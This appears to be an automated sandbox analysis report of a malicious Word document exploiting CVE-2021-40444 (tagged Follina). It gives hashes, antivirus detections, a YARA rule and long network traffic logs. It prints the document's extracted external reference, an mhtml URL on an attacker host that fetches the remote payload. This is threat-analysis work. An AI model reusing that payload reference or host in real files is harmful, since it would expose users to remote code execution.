Edit tour

Windows Analysis Report
nnxPt0Yydv.doc

Overview

General Information

Sample Name:	nnxPt0Yydv.doc
Analysis ID:	696518
MD5:	15b691f0c5d627e71fed8a5d34fb0328
SHA1:	1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256:	3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
Tags:	CVE-2022-30190docFollina
Infos:

Detection

CVE-2021-40444

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Detected CVE-2021-40444 exploit

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2476 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	EXPL_CVE_2021_40444_Document_Rels_XML	Detects indicators found in weaponized documents that exploit CVE-2021-40444	Jeremy Brown / @alteredbytes	0x3f8:$b1: /relationships/oleObject 0x412:$c1: Target="mhtml:http 0x45f:$c2: !x-usc:http 0x4a7:$c3: TargetMode="External"

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nnxPt0Yydv.doc

Avira: detected

Multi AV Scanner detection for submitted file

Source: nnxPt0Yydv.doc	ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc	Virustotal: Detection: 48%			Perma Link

Exploits

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6

Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown

HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
